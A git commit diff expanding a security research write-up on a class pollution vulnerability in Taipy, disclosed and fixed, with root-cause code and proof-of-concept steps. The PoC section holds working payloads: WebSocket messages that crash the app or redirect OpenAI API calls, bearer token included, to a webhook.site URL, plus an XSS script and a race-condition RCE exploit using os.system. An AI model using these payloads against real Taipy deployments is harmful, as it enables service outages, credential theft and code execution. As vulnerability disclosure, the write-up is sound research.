docs: expand Taipy showcase with detailed vulnerability analysis

jackfromeast · jackfromeast · commit 7c5e82684f12 · 2026-05-19T20:24:38.000-04:00
Provide a comprehensive breakdown of the class pollution vulnerability in Taipy to better illustrate its impact and root cause. This update replaces high-level descriptions with specific exploitation scenarios, including remote code execution, denial of service, and sensitive data leakage. These details offer a clearer understanding of the risks associated with unvalidated attribute modification in dynamic state updates.
diff --git a/website/source/content/docs/collection/showcases/taipy.md b/website/source/content/docs/collection/showcases/taipy.md
@@ -16,9 +16,17 @@ weight: 3
 | Input | Remote (WebSocket) |
 | Status | Fixed |
 
+## Summary
+
+We identified a class pollution vulnerability in Taipy that allows attackers to overwrite the Taipy runtime context, leading to severe consequences including remote code execution (RCE), reflected XSS, denial of service (DoS), and leakage of sensitive authorization credentials (e.g., OpenAI tokens).
+
 ## Vulnerability
 
-The vulnerability lies in `_attrsetter` in `taipy/gui/utils/_attributes.py`, which processes client update requests via WebSocket:
+The root cause lies in Taipy's use of a set function that walks a dotted attribute path to update variable values in Taipy states. Both the `name` and `value` fields of the client's WebSocket message are attacker-controlled and are not validated. This allows an attacker to supply a path such as `_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set` to overwrite the `set` method of `_TaipyBase`.
+
+The following functions are invoked in multiple routes via `_manage_message` to update states from the client side:
+
+[`taipy/gui/utils/_attributes.py`](https://github.com/Avaiga/taipy/blob/5c56f125a2bab02a260eee88503ee480ac933f7e/taipy/gui/utils/_attributes.py#L37-L42):
 
 ```python
 def _attrsetter(obj: object, attr_str: str, value: object) -> None:
@@ -29,63 +37,156 @@ def _attrsetter(obj: object, attr_str: str, value: object) -> None:
     setattr(obj, var_name_split[-1], value)  # Attr-Set only
 ```
 
-The function:
-1. Splits the attacker-controlled `attr_str` by dots
-2. Resolves each segment via `getattr` (Constrained-Get)
-3. Sets the final attribute with `setattr` (Attr-Set)
+[`taipy/gui/utils/_attributes.py`](https://github.com/Avaiga/taipy/blob/5c56f125a2bab02a260eee88503ee480ac933f7e/taipy/gui/utils/_attributes.py#L53-L58):
 
-No validation is performed on the attribute path.
+```python
+def _setscopeattr_drill(obj: object, attr_str: str, value: object) -> None:
+    var_name_split = attr_str.split(sep=".")
+    for i in range(len(var_name_split) - 1):
+        sub_name = var_name_split[i]
+        obj = getattr(obj, sub_name)
+    setattr(obj, var_name_split[-1], value)
+```
 
-## Detection by Pyrl
+The functions:
+1. Split the attacker-controlled `attr_str` by dots
+2. Resolve each segment via `getattr` (Constrained-Get)
+3. Set the final attribute with `setattr` (Attr-Set)
 
-Pyrl tracks the taint from WebSocket input:
+No validation is performed on the attribute path.
 
-1. `attr_str` and `value` parameters carry `T_INPUT`
-2. After `split(".")`, `var_name_split` is `T_ENUM`
-3. Loop iteration produces a `T_KEY` for each `sub_name`
-4. `getattr(obj, sub_name)` produces `T_OBJ` with `G_ATTR`
-5. Since only `getattr` is used (no item access branch), the program is **Constrained-Get**
-6. The `setattr` sink classifies the write as **Attr-Set**
+## PoC
 
-Classification: **Constrained-Get × Attr-Set**
+### Consequence 1: DoS
 
-## Exploitation
+<video controls width="100%">
+  <source src="https://drive.google.com/file/d/1BESvtyaJyEOp0BkeFdZFdwj83_E9wp18/preview" type="video/mp4">
+</video>
 
-### DoS
+**Steps:**
 
+1. Set up the tutorial case from the [Taipy Getting Started Guide](https://docs.taipy.io/en/latest/tutorials/getting_started/) at `http://localhost:5000`.
+2. Visit the page, intercept the WebSocket request, and replace the `name` field with `_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set`. This overwrites the `set` method of `_TaipyBase` with a non-callable integer.
+
+```json
+["message",{"type":"U","name":"_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set","payload":{"value":71,"on_change":"slider_moved"},"propagate":true,"client_id":"20250313210404484031-0.3099351422929606","ack_id":"Li_DKilnNL_N2AILnmFsD","module_context":"__main__"},null]
 ```
-attr_str: __class__.__getattribute__
-value: "crash"
-```
 
-### XSS
+3. Refresh the page and observe that dragging the slider causes the application to crash.
+
+**Effect**: `_TaipyBase.set` is overwritten with a non-callable integer. Any subsequent state update operation raises `TypeError`, making the application completely unusable for all users.
+
+---
+
+### Consequence 2: OpenAI Token Leakage
+
+**Steps:**
 
-Via the same BeautifulSoup entity map technique as django-unicorn:
+1. Set up the LLM ChatBot example from the [Taipy ChatBot Tutorial](https://docs.taipy.io/en/latest/tutorials/articles/chatbot/) at `http://localhost:5000`. The source code can be found [here](https://github.com/Avaiga/demo-chatbot).
+2. Visit the page, send a message (e.g., "hello"), and intercept the WebSocket request. Replace the `name` field with `client.base_url` and the `value` field with an attacker-controlled URL. This step may require multiple attempts to succeed.
+
+```json
+["message",{"type":"U","name":"client.base_url","payload":{"value":"https://webhook.site/0df4ac02-0b20-4ffc-bbda-287da8bc8a0a"},"propagate":true,"client_id":"20250315152148416630-0.5672333200699874","ack_id":"8OBXzCgeNv_DDW4MGpgnW","module_context":"__main__"},null]
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.bs4.dammit.EntitySubstitution.CHARACTER_TO_XML_ENTITY.<
-value: <script>alert(1)</script>
+
+3. Send additional messages and observe that requests intended for OpenAI are redirected to the attacker's server, along with the associated OpenAI token.
+
+**Effect**: The attacker-controlled `base_url` causes all subsequent API calls (including the `Authorization: Bearer <token>` header) to be sent to the attacker's server, leaking the OpenAI API key.
+
+---
+
+### Consequence 3: XSS
+
+<img src="https://github.com/user-attachments/assets/0aae38bb-8f08-4850-93c0-ffd60d9006ee" alt="Taipy XSS via class pollution" width="100%">
+
+In [`taipy/gui/gui.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/gui.py#L542-L546), when the application attempts to render user content, if the content provider is not found, it falls back to returning `type(content).__name__` as the HTML response:
+
+```python
+def _get_user_content_url(self, ...):
+    ...
+    if provider is None:
+        return type(content).__name__
 ```
 
-### RCE
+However, the `__name__` attribute of a class object is settable through class pollution, e.g., `tp_TpExPr_gui_get_adapted_lov_past_conversations_NoneType_TPMDL_2_0.__class__.__name__`. An attacker can overwrite this attribute with a malicious HTML or JavaScript payload.
+
+**Exploit:**
 
-Via environment variable pollution:
+```python
+pollute(
+    "tp_TpExPr_gui_get_adapted_lov_past_conversations_NoneType_TPMDL_2_0.__class__.__name__",
+    "<script>alert(document.domain)</script>"
+)
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.os.environ.BROWSER
-value: /bin/sh -c 'reverse_shell_command'
+
+**Effect**: The attacker's script is injected into pages served to users who trigger the content rendering path.
+
+---
+
+### Consequence 4: RCE
+
+<img src="https://github.com/user-attachments/assets/6419bc85-2492-44f2-857e-a7f60158ae31" alt="Taipy RCE via class pollution" width="100%">
+
+The class pollution vulnerability allows attackers to set arbitrary attributes on objects that appear in the session state. We found that the `Gui.on_action` route can be leveraged to invoke the `Gui.table_on_edit` method, which allows new objects from the `__main__` module to be bound into the session state. In [`taipy/gui/gui.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/gui.py#L1872), a `getattr` call on the state object automatically triggers the binding operation, while a subsequent `setattr` immediately resets the bound value to `None`:
+
+```python
+setattr(state, var_name, None)  # resets the value bound by the preceding getattr
 ```
 
-### Token Leakage
+This behavior creates a brief race window where object references, such as the `Gui` class, temporarily exist in the session state. During this window, attackers can exploit class pollution to overwrite attributes on those objects.
+
+We further discovered that the `Gui.__SELF_VAR` attribute is used as a prefix when constructing expressions passed to Python's built-in `eval()` function in [`taipy/gui/utils/_evaluator.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/utils/_evaluator.py#L265):
 
-Via disabling SSL verification or redirecting API calls:
+```python
+expr = f"{self.__SELF_VAR}.{expression}"
+eval(expr, ...)
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.os.environ.REQUESTS_CA_BUNDLE
-value: /dev/null
+
+By overwriting the `__SELF_VAR` value through class pollution, an attacker can control the expression that gets evaluated, ultimately leading to arbitrary code execution on the server.
+
+**Exploit (race condition):**
+
+```python
+import threading
+
+# pollute_race and overwrite_race are helpers that are not shown in this excerpt.
+def run_race():
+    num_pollute = 300
+    barrier = threading.Barrier(num_pollute + 1)
+    payload = "__import__('os').system('touch /tmp/pwned')"
+
+    threads = []
+    for _ in range(num_pollute):
+        # Each thread targets the name-mangled Gui.__SELF_VAR attribute.
+        t = threading.Thread(
+            target=pollute_race,
+            args=("Gui._Gui__SELF_VAR", payload)
+        )
+        threads.append(t)
+        t.start()
+
+    # Start the competing overwrite thread.
+    t_overwrite = threading.Thread(target=overwrite_race, args=("Gui",))
+    threads.append(t_overwrite)
+    t_overwrite.start()
+
+    barrier.wait()
 ```
 
+**Effect**: Arbitrary shell command execution as the Taipy server process user.
+
 ## Impact
 
-Taipy is used in production ML pipelines and data applications. The WebSocket endpoint is accessible to any authenticated user, making this a remote-triggerable vulnerability with severe consequences. Taipy Enterprise promptly patched the issue after responsible disclosure.
+Any user who can reach a Taipy application's WebSocket endpoint can exploit this vulnerability to achieve RCE, reflected XSS, or denial of service (DoS), or to leak sensitive authorization credentials (e.g., OpenAI tokens). The endpoint is accessible to any user, which makes the vulnerability remotely triggerable. Taipy Enterprise promptly patched the issue after responsible disclosure.
 
 ## Proof of Concept
 
-See [`cp-collection/taipy/poc/`](https://github.com/jackfromeast/python-class-pollution/tree/main/cp-collection/taipy/poc) for the full exploit.
+[`cp-collection/taipy/poc/`](https://github.com/jackfromeast/python-class-pollution/tree/main/cp-collection/taipy/poc):
+runnable exploit environment with `run.sh` and `requirements.txt`.
+
+Full exploit scripts:
+- [RCE exploit](https://gist.github.com/jackfromeast/df377c20520c101ab61111b8f6da6583#file-rce-py)
+- [XSS exploit](https://gist.github.com/jackfromeast/df377c20520c101ab61111b8f6da6583#file-xss-py)
+
+## References
+
+1. CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes. <https://cwe.mitre.org/data/definitions/915.html>
+2. Class Pollution leading to RCE in pydash. <https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca>
+3. Prototype Pollution in Python. <https://blog.abdulrah33m.com/prototype-pollution-in-python/>
+4. Google Mesop fix (similar vulnerability). <https://github.com/google/mesop/pull/1171>
+5. Liu et al. *The First Large-Scale Systematic Study of Python Class Pollution Vulnerability*. IEEE S&P 2025. <https://jackfromeast.github.io/assets/Pyrl.pdf>
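
The traversal in `_setscopeattr_drill` can be reproduced outside Taipy. The following is a minimal standalone sketch, assuming hypothetical stand-in classes `Base`, `Slider`, and `State` (none of them are Taipy classes). It shows how a dotted path ending in `__class__.__base__.set` replaces a method on a shared base class, so that every instance is affected:

```python
class Base:
    """Hypothetical stand-in for a shared base class such as `_TaipyBase`."""

    def set(self, value):
        self.value = value


class Slider(Base):
    """Hypothetical stand-in for a state variable wrapper."""


class State:
    """Hypothetical state container holding one variable."""

    def __init__(self):
        self.slider = Slider()


def setscopeattr_drill(obj, attr_str, value):
    # Same traversal as the `_setscopeattr_drill` function quoted in the diff:
    # resolve every segment but the last with getattr, then setattr the last.
    var_name_split = attr_str.split(sep=".")
    for i in range(len(var_name_split) - 1):
        obj = getattr(obj, var_name_split[i])
    setattr(obj, var_name_split[-1], value)


state = State()
other = Slider()   # an unrelated instance, e.g. one belonging to another user
other.set(1)       # works before the pollution

# Attacker-controlled path and value, mirroring the DoS payload shape.
setscopeattr_drill(state, "slider.__class__.__base__.set", 71)

try:
    other.set(2)
    polluted = False
except TypeError:
    # `Base.set` is now the integer 71, so calling it fails for every instance.
    polluted = True

print("polluted:", polluted)
```

Because the write lands on the class rather than on the instance, the damage is not limited to the session that sent the message.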